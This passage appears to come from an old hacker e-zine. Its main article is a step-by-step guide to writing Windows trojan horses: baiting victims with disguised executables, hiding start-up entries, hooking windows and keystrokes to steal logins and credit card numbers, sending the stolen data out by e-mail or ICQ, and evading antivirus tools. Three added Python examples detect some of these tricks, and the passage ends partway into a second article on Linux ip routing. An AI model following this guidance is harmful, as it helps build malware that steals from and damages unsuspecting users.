 On that subject, some time ago an angry mail arrived in which some guy
 cursed mercilessly that such-and-such a function definition was not so and
 so, but very wrong. It turned out that the fellow was simply so talentless
 that he had not read the preceding two or three lines of the article and
 so had not understood what it was about. Well, there is no way to help
 cretins like that.

 Roll up your sleeves and don't be put off by failures...


   ii. What a trojan horse is and what it is used for


 Trojan horses, most generally speaking, are background processes that carry
 out activities without your knowledge and, above all, against your will.
 The presence of a trojan horse is the result of your carelessness. The
 blame for having a trojan horse is usually entirely yours, since you
 allowed (through carelessness or for some other reason) the horse's process
 to be installed and started on your machine.

 That is what the most abstract definition of a trojan horse I could think
 of looks like. From here on follows a rich variety of activities the horses
 can carry out, ways in which they can be installed, and so on. This
 article, as the title shows, looks at the Windows-oriented critters, but if
 you still want to find out how things stand on Linux, you had best read
 IronCode's article as well.

 Some of the main uses of trojan horses:

 * Trojan horses for appropriating other people's accounts - the most
   widespread horses, whose sole aim is to grab a particular kind of account
   (be it Dial-up, FTP, telnet, mail or other). Once they catch an account,
   they send it in some way to the owner of the horse, as a result of which
   he obtains the other person's personal data.

   The most widespread variant in Bulgaria is the one that watches only for
   Dial-up accounts, since access to the ISPs in BG is a privilege only of
   the better-off. This type of horse may also have a built-in sniffer or
   keyboard capturing system.

 * Trojan horses for flooding - they made a stir after the several attacks
   on BTC's servers, which drew a response around the world. The idea of
   these horses is to generate traffic towards a given server and in this
   way, provided the horse is well distributed, to flood the server. They
   are interesting not only from an anarchic point of view, but also because
   they apply techniques that take advantage of oversights in the TCP/IP
   protocol. A defence against an attack generated with this kind of trojan
   horse has not yet been invented, and its very mode of operation does not
   lend itself to defence.

   (Note, Iron - actually, however TCP/IP had been written, there would
    hardly have been a defence against such an attack. So I don't know
    whether one can speak of oversights...)

 * Keyloggers - these are horses that track everything entered from the
   keyboard. They are usually used for lifting credit cards, and in this
   variant they do not capture everything typed on the kbd, only the part
   that has some chance of being credit card information.

   They are relatively easy to write and are a convenient alternative for
   purposes such as reconnaissance and espionage.

 * Blow-up trojan horses - the kind of horse that will try, as quickly as
   possible, to wipe your HDD or at the very least cause some damage. They
   were very popular in the days of the BBS systems, which ran mostly under
   DOS and were open to a large number of anarchistic attacks. Lamer stuff.
   There is a well-known trojan horse of this kind that is nothing more than
   a compiled .bat file containing a single "format c:" command.

 * Remote administration tools - behind this grandiose name hide all those
   little programs that claim they should be used only if you want to
   administer your PC over the network. BULLSHIT. Pure-bred horses for
   lamers. They usually have some pseudo-command interpreter or simply make
   a gate to command.com.

 Naturally, these are only the main kinds of trojan horse, the most
 widespread ones. There are all sorts of developments on the theme, some of
 them so exotic that one could hardly imagine trojan horsing in such a light
 (for example, at an informatics competition, instead of a solved problem a
 trojan horse is handed in, which rummages through the jury's HDD in search
 of the answers to the problems and, if it finds them, simply spits them out
 after a 10-20 sec. delay, simulating hard work in the meantime).

 (Note, Iron - don't grin, on a team with EXo we really did this once, but it
  did not spit out the solution, it sent us the tests so that we could see
  our mistake. We sorted ourselves out, though, before the goodies
  arrived :-) Metalista, on the other hand, pulled off the variant above
  successfully ;-)


   iii. Baiting


 The trojan horse, as described in the definition, acts without the
 knowledge of the owner of the PC it runs on, and so starting a trojan horse
 happens in a rather special way, i.e. the victim has to be tricked into
 running the trojan horse, and without realising at all that he has done
 anything wrong. The process of tricking the victim and installing the horse
 is most generally called baiting. Issue 17 describes the main baiting
 methods (by e-mail, over IRC, ICQ etc.), and issue 19 describes methods for
 finding the e-mail addresses of potential victims.

 One interesting method that has not been mentioned so far is via an
 auto-run CD. Since many systems have the Windows autorun option turned on,
 you can easily trick someone into loading your horse, even someone who
 fancies himself very clever.

 One of the dumbest methods, on the other hand, is sending a file with a
 name of the form

    abc.jpg                                                           .exe
                 ^^^^^^^^^^^^^^^^ over 200 spaces

 , which in ICQ looks exactly like a .jpg, and the more careless and
 trusting user may open it without a second thought. Such files appear in
 the Windows folder explorer as "abc.jpg ..." provided "detailed view" of
 the files is turned on. The trick also works with some IRC clients, and the
 interesting thing is that some versions of ICQ even crash when they are
 sent a file with too long a name.
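
 The padded file name described above, seen from the receiving side: an added
 example (not part of the original article) that flags such names at a mail
 or file-transfer gateway. It also covers the plain "photo.jpg.exe" double
 extension, which goes slightly beyond the text; the extension lists, the
 padding threshold and the 40-column display width are assumptions, and the
 sample names are constructed.

```python
import re

# Assumed lists for this example; extend them to match local policy.
EXECUTABLE_EXTS = {".exe", ".com", ".bat", ".cmd", ".pif", ".scr"}
DECOY_EXTS = {".jpg", ".jpeg", ".gif", ".bmp", ".txt", ".doc", ".zip"}

PAD_THRESHOLD = 8    # whitespace run length treated as padding (assumption)
DISPLAY_WIDTH = 40   # columns a transfer dialog is assumed to show


def split_ext(name):
    """Return (stem, ext) using the LAST dot, which is what selects the handler."""
    name = name.rstrip()
    dot = name.rfind(".")
    if dot <= 0:
        return name, ""
    return name[:dot], name[dot:].lower()


def displayed_name(name, width=DISPLAY_WIDTH):
    """Approximate what a width-limited file list shows to the user."""
    if len(name) <= width:
        return name
    return name[:width].rstrip() + " ..."


def inspect_filename(name, width=DISPLAY_WIDTH):
    """Report the real extension, the visible name and why the name is suspect."""
    stem, ext = split_ext(name)
    flags = []

    # Any long run of whitespace (spaces, tabs, NBSP) inside a name is padding.
    longest_pad = max((len(m.group()) for m in re.finditer(r"\s+", name)),
                      default=0)
    if longest_pad >= PAD_THRESHOLD:
        flags.append("whitespace-padding")

    # A harmless-looking extension sitting in front of the executable one.
    _, inner_ext = split_ext(stem)
    if ext in EXECUTABLE_EXTS and inner_ext in DECOY_EXTS:
        flags.append("decoy-extension-before-executable")

    # The real extension starts beyond what the dialog can display.
    if ext and name.rstrip().rfind(".") >= width:
        flags.append("real-extension-off-screen")

    return {"real_ext": ext,
            "displayed": displayed_name(name, width),
            "flags": flags}


def suspicious(names):
    """Return (name, report) pairs for every name that raised a flag."""
    reports = ((n, inspect_filename(n)) for n in names)
    return [(n, r) for n, r in reports if r["flags"]]


# Constructed sample input: two honest names and three deceptive ones.
SAMPLE_NAMES = [
    "holiday.jpg",
    "setup.exe",
    "abc.jpg" + " " * 210 + ".exe",
    "photo.jpg.exe",
    "notes.txt" + "\t" * 9 + ".scr",
]

if __name__ == "__main__":
    for name, report in suspicious(SAMPLE_NAMES):
        print(repr(report["displayed"]), report["real_ext"], report["flags"])
```

 A gateway can reject or rename anything that raises a flag; the "displayed"
 field shows the operator what the recipient would have seen.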

 Some people are very fond of the on-join send in IRC channels. This rarely
 works any more, but if someone does bite, the baiting is a sure thing.

 Another method, which was described in PHM20, is installing a trojan horse
 with nothing more than the extraction of a .zip. If I think of any others,
 I will add them before the end of the article, but I have almost certainly
 missed some baiting/distribution method, so don't be afraid to rely on your
 imagination.

 Naturally, it is a good idea to polish the baiting scenario to the maximum,
 since this is exactly where social engineering techniques play the most
 important role. You may have an incredibly well made horse that you cannot
 pass off on anyone because you are no good at lying. That, of course,
 nobody can teach you...


   iv. Starting


 Once the horse has installed itself, there are several ways to start it at
 every Windows boot:

 * via system.ini - perhaps few people know of the "run=" and "load=" fields
   in the [boot] section of system.ini, which are left over from Windows 3.1
   and allow a program to be loaded when Windows starts. In fact, in the
   good old days this was the only way to load a program without it being
   openly visible in the StartUp folder. This way, however, still works on
   Win9x systems.

   Actually, come to think of it, the "shell=" command can also be changed,
   so that instead of explorer.exe your own shell is loaded, which is simply
   the trojan horse, starting itself and then starting explorer.exe. I have
   not tried it, but by the look of it there is a chance it works.

 * via the registry - the most standard way of loading software, used by
   every second shareware program. Unfortunately it is easily discovered if
   we have not taken the trouble to disguise the .exe under some nice name.
   Look at the Software\Microsoft\Windows\CurrentVersion\Run section of
   HKEY_CURRENT_USER and you will see what this is about.

 * winstart.bat - this is the file used when installing software that has to
   replace some system file which is in use during the installation of the
   software. It is useful in our case for its property of being loaded
   before krnl386.exe itself is started and before any .dll, .drv, .vxd and
   so on are booted.

 * via a hacked .exe or .dll - this method assumes that you are familiar
   with the PE and LE [14] structures of the executable files and dynamic
   libraries used by Windows. So you simply rearrange the program segments
   and replace the startup point with your code, which you attach to the
   .dll or the .exe. This code of yours then calls the original code of the
   DLL. The method is logically sound, but so far I have not seen it
   implemented.

   (Note, Iron - actually this is just like infecting with a virus)

   Bear in mind also the fact that while system .dlls are in use you cannot
   touch them because of sharing restrictions. In that case you have to look
   for some alternative for installation (for example winstart.bat).

 * by shunting a .dll - you make your own .dll with the same name as some
   system .dll and put code for loading the horse in the init procedure.
   After that the original .dll is called in turn. Take care to collect all
   the exports and put them in your .dll, so that it looks exactly like the
   original.

 It is good to combine these basic methods with one another, so that if one
 fails, the horse keeps being loaded.

 It is good to compress the horse and try to make it as small as possible,
 because nobody likes downloading big files, and large mail is suspicious.
 For this a compression program of the Petite sort can be used, although the
 .EXE compressor in question [6][7][8] sometimes chokes if your .exe has a
 more unusual structure. Using some anti-debugging techniques is not a bad
 idea either, since once caught, the horse will be taken apart to find out
 what it does [15].
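
 The first three start-up locations listed in this section (the "run=",
 "load=" and "shell=" entries, the Run key of HKEY_CURRENT_USER and
 winstart.bat) are also the first places to look when checking a machine. An
 added example, not part of the original article: it audits a snapshot of
 those locations. The snapshot contents, the allow-list and all file names in
 the sample are constructed.

```python
import ntpath
from collections import namedtuple

Finding = namedtuple("Finding", "location entry value reason")


def parse_ini(text):
    """Minimal INI reader: {section: [(key, value), ...]}, names lower-cased.
    Duplicate keys are kept, since system.ini repeats device= lines."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, [])
        elif "=" in line and current is not None:
            key, value = line.split("=", 1)
            sections[current].append((key.strip().lower(), value.strip()))
    return sections


def first_program(command):
    """Best-effort program path from a command line (quoted or unquoted)."""
    command = command.strip()
    if command.startswith('"'):
        end = command.find('"', 1)
        return command[1:end] if end != -1 else command[1:]
    return command.split()[0] if command else ""


def audit_ini(text, source="system.ini"):
    # run=/load= are looked up in every section, so win.ini text can be
    # passed to the same function.
    findings = []
    for section, entries in parse_ini(text).items():
        for key, value in entries:
            if key in ("run", "load") and value:
                findings.append(Finding(source, f"[{section}] {key}=", value,
                                        "program launched at Windows start-up"))
            if section == "boot" and key == "shell":
                shell = ntpath.basename(first_program(value)).lower()
                # Only the file name is compared; a full check would also
                # verify the directory and the file contents.
                if shell != "explorer.exe" or len(value.split()) > 1:
                    findings.append(Finding(source, "[boot] shell=", value,
                                            "shell is not plain explorer.exe"))
    return findings


def audit_run_key(values, known_good,
                  key=r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run"):
    """values: {value name: command line} exported from the Run key."""
    findings = []
    for name, command in sorted(values.items()):
        exe = ntpath.basename(first_program(command)).lower()
        if exe not in known_good:
            findings.append(Finding(key, name, command,
                                    "not on the reviewed allow-list"))
    return findings


def audit_winstart(file_names, directory=r"C:\WINDOWS"):
    return [Finding(directory, n, "", "batch file run early in Windows start-up")
            for n in file_names if n.lower() == "winstart.bat"]


# Constructed snapshot of one machine; every name below is made up.
SAMPLE_SYSTEM_INI = r"""[boot]
shell=C:\WINDOWS\example-shell.exe
run=C:\WINDOWS\SYSTEM\example-loader.exe
load=
[386Enh]
device=*vcache
device=*dynapage
"""
SAMPLE_RUN_KEY = {
    "SystemTray": "SysTray.Exe",
    "Updater": r'"C:\WINDOWS\SYSTEM\example-helper.exe" /s',
}
SAMPLE_WINDOWS_DIR = ["WIN.INI", "SYSTEM.INI", "WINSTART.BAT", "EXPLORER.EXE"]
KNOWN_GOOD = {"systray.exe"}  # assumed allow-list reviewed by the administrator


def audit_host(ini_text=SAMPLE_SYSTEM_INI, run_values=SAMPLE_RUN_KEY,
               windows_dir=SAMPLE_WINDOWS_DIR, known_good=KNOWN_GOOD):
    return (audit_ini(ini_text)
            + audit_run_key(run_values, known_good)
            + audit_winstart(windows_dir))


if __name__ == "__main__":
    for f in audit_host():
        print(f"{f.location}: {f.entry} {f.value}  <- {f.reason}")
```

 The hacked-executable and shunted-.dll methods leave none of these entries
 and need file hash comparison against known-good copies instead.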


   v. Watching for data


 In the end, to get something from the computer on which the trojan horse is
 running, you first have to catch what you need. Here again there are
 several basic methods.

 * windows hooking - the standard Windows API gives us the ability to set
   so-called hooks, which let us watch for particular events or, more
   precisely, for particular messages passed to applications. With their
   help we can easily step in at exactly the moment before a given window is
   closed and take information from its fields, with the guarantee that it
   is the most up to date. The SetWindowsHookEx function is used; you will
   find information on it in Microsoft's standard API Help or in MSDN.

   The idea is that you create your own function which, once the hook is
   set, is called under precisely defined conditions. Since with the help of
   hooks you can intercept practically any event (even the movement of the
   mouse across the screen), their use is to be recommended even over some
   more advanced techniques, since there is no need to dig around inside the
   system.

   For example, you can watch for the appearance of the Connect To dialog
   box and, right after the user presses connect, take the contents of the
   text fields. Or in a similar way watch SecureCRT or the standard telnet
   session when a new connection is created and grab the login and the
   password - something that is unthinkable to do any other way, especially
   if the connection is encrypted.

   A drawback of this method is that it is caught by software such as
   Dr.Watson, which gives advanced info on the system and the loaded
   drivers/processes. See issue 17 for more examples.

 * keyboard capturing - very useful and with practically unlimited
   application. You can use it on the one hand when someone enters a given
   authorisation by hand, or to catch all forms that have been submitted
   through some browser. The latter also lets us catch credit cards, by
   simply tracing everything that passes through the browser and, when we
   spot a CC number, saving 1 kb ahead and 1 kb back. The ways of catching
   CCs with such techniques are described in more detail in StarGruhtar's
   article. The thing you have to watch out for here is Caps Lock and Shift
   being pressed, since they determine lower and upper case letters.

 * sniffing - sniffing is a basic technique used in breaking into Linux
   systems. The idea is to intercept all the traffic at the TCP/IP level
   and, by filtering the connections, catch your dinner. For this a VxD has
   to be written [4][13]; information on writing .vxds is in PHM19. If you
   don't know what sniffing is, it is a good idea to read kay's article in
   this issue. Solar Eclipse is currently also working on a libpcap module
   for WinNT, which gives you the ability to write sniffers for Windows, but
   whether and when he will finish it is hard to predict.

 * deceiving the opponent - this is a particular social engineering method
   that is possibly the lamest solution for a trojan horse, but it is
   surprising how often it works. You need to make a program that claims to
   do something connected with the authorisation you are interested in, and
   if the program really is decent and does something useful (while in the
   meantime taking whatever it needs), you can be sure that quite a few
   users will get caught through their own gullibility.

   The oldest BG trojan horse for accounts known to me worked on exactly
   this principle - it poses as a program that checks the users' online
   time. Plenty of scenarios can be invented in this respect.


   vi. Storing and sending the collected information


 Naturally, you have to keep the info you have already collected somewhere
 until it is sent to you by email [12] or in some other way. Wherever you
 keep your intermediate data, be it in the registry or in some file on the
 HDD or God knows where, it is advisable to encode whatever you can, so that
 some chance passer-by does not find it. When sending the email it is
 absolutely mandatory to encode it first, preferably with some clever
 algorithm (PGP [9], though a little harder to link in, is a very good
 idea). You can make your horse create some encoding table that is generated
 according to the local configuration. Then you send by mail, unencoded,
 only the data in question that were used as the basis, and when you receive
 the mail you have the guarantee that only you know how to decode it.

 Sending the data, for its part, can also be done in different ways
 depending on the situation, but usually submission by e-mail is used. If
 you play around a bit more you can surely work out submission over ICQ as
 well, which will arouse less suspicion, since even if you do not hide your
 connection to the mail server, no strange connection will be seen in
 netstat, only a link to the mirabilis server. Since ICQ clients [1] still
 support even the older protocols (2,3,4), you can very easily find info on
 them, and sending a simple message is no great philosophy at all. I have
 seen an ICQ-based horse that works on the client-server principle and is
 something the authors of BO can only dream of. Naturally, this horse is not
 public property and is one of the best I know of.

 It is very strange that quite a few people have difficulty precisely with
 the code for sending e-mail. Nevertheless I recommend that you not use
 assorted ready-made libraries, but write something entirely your own. I
 personally have managed to fit the sendmail procedure in question into 20
 lines of C, with waiting for the responses and error handling at that. And
 that does not take much philosophy - don't be spoiled.


   vii. Kofti momenti i dobri idei


 Kofti momentite pri pisaneto na troyanski kone suwsem ne sa malko i ponqkoga
 stawat  razni  gadni  ulowki, koito mogat da wi spunat progresa za 3-4 dena.
 Wsustnost  ima  nqkoi osnowni nesta, koito ne trqbwa da prawite ili za koito
 trqbwa da znaete.

 * WriteFile skapwa hookowete - neznajno zasto WriteFile skapwa hookowete pri
   pisane.  Kogato  si  praweh  keylogger  za  NT mi trqbwashe dosta wreme da
   shwana,  che  problemut  ne  e  w  logikata  na logger-a, a w towa, che se
   opitwah  direktno  ot  hook  procedurata  da  pisha  w  edin  file.  Towa,
   estestweno,  se oprawq mnogo lesno, kato si slovite edin timer, kojto prez
   opredelen  interwal ot wreme da prowerqwa nqkakwo buferno mqsto (napr. key
   w  registrito)  dali  sa  se  poqwili nowi danni, koito da se save-nat wuw
   filecheto.  Strannoto  e,  che  pod Win9x toq bug go nqma ili pone ne se e
   proqwqwal.

 * With the system.ini method described above, if we have hooked before the
   systray has loaded, we can simply forget about our hooks working. One
   more mysterious bug, which took me almost a week before I realised why
   the hook did not work after a restart even though the process was
   running.

   The best idea that comes to mind as a possible solution, though, is to
   set a timer that waits about 20 seconds and only then runs the essential
   part of the horse's code (i.e. installing the hooks, etc.)

 * Horses that have not taken care to fix their own date after installation
   are caught very easily. Lamers, however lame they are, sometimes have the
   wits to sort the files by creation date and time. And when they see our
   horse with the newest date, they immediately figure that this animal has
   only recently been wagging its tail in the system and is therefore quite
   suspicious. Think about what date your files will have after
   installation.

 * Hooks do not work unless they are in a separate DLL - although if we read
   Microsoft's help for SetWindowsHookEx it will seem that we can cram both
   the thread and the hook into one file. That is true to an extent, except
   that the hook then works only for the local process, which is of no use
   to us at all. That is why we have to put our hooks in a .DLL and fetch
   them from there with the standard Windows API functions.

 * Once recognised, the horse is easily caught by antivirus programs - if
   the antivirus programs detect your horse, all your infected PCs will be
   blown at once. For this purpose an algorithm can be devised that changes
   the name of the program. For example, it looks for some .exe in the
   windows or system directory and names itself the same way, only with
   "32" at the end. For example, "progman.exe" becomes "progman32.exe". If a
   fake change of the length of the .exe is made as well, you will mislead
   antivirus software products considerably more successfully.

 * Several alternative ways of restoring the horse should be thought out, so
   that if someone figures out where it is loaded from and deletes it, the
   horse then installs itself again.

 * Live update will sound strange to many people in the context of horsing,
   but think how agile your horse will be if it has live-update functions.
   You will be able to calmly update all the infected user machines with the
   new, better versions. And making a live update is not hard at all. Here
   are a few methods:

   1) you create some page, get it indexed in AltaVista, and your horse
      simply searches for a particular string. Once it finds it, it does a
      version check, fetches a newer version and is content. Downloading
      the new version takes just a call to the function FTPGetFileEx() (or
      something like that) from wininet.dll.

   2) You put a daemon on some server, listening on some port, or you run
      an IRC bot that sends the update.

   3) You pop a particular e-mail account (quite a good idea), without the
      messages being deleted. The horse checks for the newest version and
      pulls it without deleting the e-mail.

   In general, ideas abound, as long as you have the will.

 * With Resource Workshop you can change the horse's ICON so that it looks
   like a self-extracting .EXE or like a setup file from Wise Solutions.
   Naturally, you can do this at compile time as well. It is a good idea to
   also change the version info of the .exe so that it matches the icon.
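
 Seen from the defending side, the "32" renaming and the file-date points in
 the list above give a simple triage check. The following is an added example,
 not part of the original article: the function name, the allowlist and the
 sample listing are constructed assumptions.

```python
from datetime import datetime

# Assumption: names that legitimately ship next to their base name on a clean
# install. Build the real list from a known-good system; this entry is only
# illustrative.
KNOWN_GOOD = {"rundll32.exe"}


def find_32_lookalikes(listing, known_good=KNOWN_GOOD):
    """listing: iterable of (file name, creation time) for ONE directory.

    Reports every NAME32.exe that sits beside a NAME.exe and is not on the
    allowlist, together with what its creation time says about it.
    """
    created = {name.lower(): ts for name, ts in listing}
    newest = max(created.values()) if created else None
    findings = []
    for name, ts in sorted(created.items()):
        if not name.endswith("32.exe") or name in known_good:
            continue
        base = name[:-len("32.exe")] + ".exe"
        if base not in created:
            continue  # e.g. regsvr32.exe has no regsvr.exe sibling
        findings.append({
            "file": name,
            "base": base,
            # installed later than the program it imitates
            "newer_than_base": ts > created[base],
            # a copied timestamp is what a "fixed" date would look like
            "same_stamp_as_base": ts == created[base],
            # the sort-by-date check described in the article
            "newest_in_dir": ts == newest,
        })
    return findings


# Constructed sample directory listing (not taken from a real system).
SAMPLE = [
    ("PROGMAN.EXE", datetime(1998, 5, 11, 20, 1)),
    ("progman32.exe", datetime(1999, 12, 1, 3, 14)),
    ("RUNDLL.EXE", datetime(1998, 5, 11, 20, 1)),
    ("RUNDLL32.EXE", datetime(1998, 5, 11, 20, 1)),
    ("REGSVR32.EXE", datetime(1998, 5, 11, 20, 1)),
    ("NOTEPAD.EXE", datetime(1998, 5, 11, 20, 1)),
]

if __name__ == "__main__":
    for finding in find_32_lookalikes(SAMPLE):
        print(finding)
```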


   viii. Conclusion


 Two months ago solar and I got together one evening and started digging in
 IE4 to find exactly where the form is processed before it is sent over the
 secure connection. We wanted to catch that spot because with IE4 we cannot
 simply take the contents of the fields on a given page, since they are
 OwnerDraw. The digging was very heavy... 12 hours of debugging (I managed
 to last about 10, solar stayed for the remaining 2).

 The main idea was to catch all calls to the string functions (strlwr,
 strstr, etc.) in kernel32.dll and see when the form data would start to
 appear [11]. And they are called hundreds of times. Naturally, with a
 SoftIce macro we can tell it to break only if the parameters contain a
 specific string, but even this method does not help much, since the string
 functions keep being called many times with one and the same string.

 Anyway, on the first day the result was almost nil. But on the second,
 luckily, the job got done, as a result of which Solar isolated exactly the
 offset that corresponds to the place where, if external code is inserted,
 the data for a given form submission can be extracted. The problem,
 however, was that for different versions of the explorer the .dll in which
 the action took place (mshtml.dll) is different, even if only by a few
 bytes.

 The idea found no application in practice, although if we had written such
 a horse, it would have caught everything that passes through IE4 forms. On
 the other hand, in the same time we could have created a fairly good
 keyboard capture which, with solid logic, would sift out only those
 requests that are of some interest to us.

 So, before you sit down to write any horse at all, think about what the
 most convenient way of writing it is. Even ideas that look flat at first
 glance can be written so that they become well-disguised horses, as long
 as you have the will.

   ix. Linkz

     [1].  http://pages.poly.edu/~slishc01/cs/icq.html
           Description of the ICQ protocol version 2.

     [2].  http://www.cs.princeton.edu/software/lcc/
           LCC Compiler

     [3].  http://www.microsoft.com/hwdev/ddk/install98ddk.htm
           Windows 98 Driver Development Kit Download

     [4].  http://www.geocities.com/Area51/Vault/6702/vxd.html
           A page about VxD coding with examples.

     [5].  http://www.bytamin-c.com/VisualAssembler/index.htm
           Visual Assembler

     [6].  http://www.icl.ndirect.co.uk/petite/
           Petite File Compressor

     [7].  http://www.jps.net/kyunghi/w32comp.htm
           Windows Executable Compressors

     [8].  http://www.suddendischarge.com/Compressors.html
           All types Compressors

     [9].  http://www.pgpi.org/products/sdk/c++/
           PGP Programming Libraries C/C++

     [10]. http://www.crackstore.com/tools.htm
           A collection of quite a few useful programs; it also has the MS
           help files.

     [11]. http://ourworld.compuserve.com/homepages/w_baudisch/InsideIE.htm
           Undocumented Functions Inside Internet Explorer 4

     [12]. http://rfc.nat.bg/documents/rfc822.txt
           SMTP Protocol

     [13]. http://www.xs4all.nl/~smit - Assembler Language Resources

     [14]. http://www.unibest.ru/~ig/docs.html   -  PE/LE/LX/NE  Executable
           Formats.

     [15]. http://www.csee.uq.edu.au/~csmweb/dcc.html#thesis - The PhD Thesis
           (decompilation related);

 >> EOA <<

 -ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú#10ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-
  [ a r t i c l e ]                                         [ a u t h o r ]
  QoS & Adv.Routing for Linux                             ManiaX & Renegade
 -ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-

 <[ 10x to Renegade (who gave me the idea to write this thing and who helped
 me a lot (for example, he wrote the whole traffic control part)), Alexey
 Kuznetzov (for the excellent guide to the ip command, part of which I have
 translated here) ]>



 With the new kernels (2.2.x) linux has begun to acquire the networking
 capabilities of a Cisco router (thanks to Alexey Kuznetzov). These
 capabilities are enabled from Network Options/Quality of Services and
 Network Options/Advanced routing.

 To use these capabilities we need the iproute2 package (or iproute2+tc),
 available from ftp.inr.ac.ru/ip-routing. It contains 2 main programs - ip
 and tc. The first is for manipulating interfaces, routing tables and so
 on, and the second is for traffic control. For the first there is a long
 and detailed guide in the package, while for the second one is still being
 written. Here I will describe both commands as far as I am able.

 The ip command can modify the following types of objects: link (modifying
 the parameters of interfaces), route (modifying the routing table), rule
 (extending the routing table with rules), address (assigning addresses to
 interfaces), maddress (multicast addresses), mroute (multicast routing),
 tunnel (creating tunnels, such as IPv6-in-IPv4), neighbour (arp table). It
 is easy to see that this command can replace, if not all, then almost all
 of netbase.

 ip link has the following commands: ip link set or ip link show (default).
 ip link show displays all interfaces with their parameters, and ip link set
 can be given the following parameters:

  dev <device>     - interface to manipulate
  up | down        - whether it is 'up' (i.e. working) or not
  arp on | arp off - whether the interface uses ARP or not (the result of
                     ip link set arp off dev xxx, if interface xxx is up,
                     can be very unpleasant)
  multicast on|off - multicast support on the interface
  name <name> - changes the name of the interface (from eth0 to xxx0, for
                example)
  txqueuelen <txq> | txqlen <txq> - size of the transmit queue
  mtu <mtu> - changes the MTU (Maximum Transmit Unit) of the interface
  address <ADDRESS> - changes the link-layer address (i.e. the ethernet
                      address)
  broadcast | brd | peer <ADDRESS> - changes the broadcast or
                        point-to-point link-layer address of the interface.

 ip link show can also be given the -statistics option, which prints
 statistics for the interface.

 An example of using ip link is the following:

 ip link set dev eth0 address 2.3.4.5
 ip link set dev eth0 arp on
 ip link set dev eth0 up

 This in effect configures eth0 with the address 2.3.4.5, sets it to use ARP
 and brings the interface up.

 ip link set dev ppp0 txqueuelen 100

 This line, in turn, enlarges the transmit queue of the ppp0 interface,
 making it like ethernet - convenient for ppp-on-ethernet links, so that the
 transmission medium is used to the full.



 ip route can be given the following commands: add, change, replace, delete,
 show, flush, get.

 <[  Short note: in linux-2.2.x the types of routing table entries are the
 following:
    unicast -- Describes a real path to a particular destination.
    unreachable -- The address is unreachable; an ICMP host unreachable
                   message is returned. The program that sent the packet
                   gets the error EHOSTUNREACH.
    blackhole -- The address is unreachable; no ICMP message is returned;
                 the program that sent the packet gets the error EINVAL.
    prohibit -- The address is unreachable; an ICMP communication
                administratively prohibited message is returned. The
                program that generated the packet gets the error EACCES.
    local -- Local; all packets are delivered back to the local machine.
    broadcast -- The address is a broadcast address; packets are sent as
                 link broadcasts.
    throw -- a special type used with policy rules. If such a route is
             selected during a look-up in the table, the look-up is
             terminated and reports that there is no such route in this
             table (if the look-up is done with policy; if it is not, this
             is equivalent to the absence of a route: an ICMP net
             unreachable message is returned and the program that sent the
             packet gets the error ENETUNREACH).
    nat -- so-called Network Address Translation; all packets with such a
           source are masked through the address given with the via
           parameter.
    anycast -- not implemented.....
    multicast -- a special type used in multicast routing. It is not found
                 in normal routing tables. ]>

 ip route add, change and replace support the following options:

    to PREFIX or to TYPE PREFIX

    -- Destination. If TYPE is not given, ip assumes type unicast.
       PREFIX is an IP or IPv6 address with an optional netmask. There is
       also one special PREFIX - default, which is equivalent to 0/0 in IPv4
       or to ::/0 in IPv6.

    tos TOS or dsfield TOS

    -- Type Of Service. It is used so that different paths can be used for
       packets with different ToS fields.

    metric NUMBER or preference NUMBER

    -- Priority/length of the route. NUMBER is an ordinary 32-bit number.

    table TABLEID

    -- Table in which to put this route. TABLEID can be a number or a string
       defined in the file /etc/iproute2/rt_tables. If this parameter is
       absent, ip assumes the table main, with the exception of local,
       broadcast and nat routes, which go into the table local by default.

    dev NAME

    -- name of the output device.

    via ADDRESS

    -- the address of the next router. In fact, the meaning depends on the
       type of route. For normal unicast routes it is either the true next
       router or the address of the interface through which to send, if it
       is an address installed in BSD. For NAT routes it is the address used
       for masking the connections passing through.

    src ADDRESS

    -- Source address from which to send the packets that fall under this
       routing rule.

    realm REALMID

    -- the 'realm' this route falls into. REALMID can be a number or a
       string from the file /etc/iproute2/rt_realms.

    mtu MTU or mtu lock MTU

    -- The MTU along the path to the destination address. If lock is not
       used, the MTU can be changed by the kernel with Path MTU Discovery.
       If lock is used, Path MTU Discovery will not be used; all packets
       will be sent without the DF bit in the IPv4 case or the fragmented
       bit for IPv6.

    window NUMBER

    -- the maximum TCP window to allow to these destinations, in bytes.
       It limits the maximum burst of data that can be sent to the host
       over TCP.

    rtt NUMBER

    -- the initial RTT ("Round Trip Time").

 <[  Note: in fact, in Linux-2.2 (and 2.0) it is not exactly the RTT but the
 timeout at the start of a TCP connection. The kernel stops using it at the
 first valid ACK received. ]>

    nexthop NEXTHOP

    -- The next hop of a multipath route. NEXTHOP is a complex value with a
       syntax similar to that of the other parameters of add:
       via ADDRESS is the next router.
       dev NAME is the device.
       weight NUMBER is the 'weight' or 'cost' of this route in the
       multipath, based on speed or quality.

    scope SCOPE_VAL

    -- scope of the destinations covered by the route prefix. SCOPE_VAL may
       be a number or a string from the file /etc/iproute2/rt_scopes. If this
       parameter is omitted, ip assumes scope global for all gatewayed
       unicast routes, scope link for direct unicast routes and broadcasts
       and scope host for local routes.

    protocol RTPROTO

    -- routing protocol for this route. RTPROTO can be a number or a string
       from the file /etc/iproute2/rt_protos. If none is given, ip assumes
       protocol boot (i.e. one added by someone who does not know what he is
       doing). Several such values have a fixed meaning:
        redirect -- route installed by an ICMP redirect.
        kernel -- route installed by the kernel during autoconfiguration.
        boot -- route installed during boot. If a routing daemon is
         started, it would delete them.
        static -- route installed by the administrator to override dynamic
         routing. The routing daemon will perhaps leave them alone and may
         even advertise them to its neighbours.
        ra -- route installed by the Router Discovery protocol.

        The remaining values are not reserved and the administrator can
        assign them to different protocols. At the very least, routing
        daemons should take care to use a value that is unique on the
        system, such as those in rtnetlink.h or in rt_protos.

    onlink

    -- says that the next hop is directly attached to this link, even if it
       does not match any interface.

    equalize

    -- Allows equalisation in a random fashion over multipath routes.
       Without this option the route will be pinned to one next hop, so the
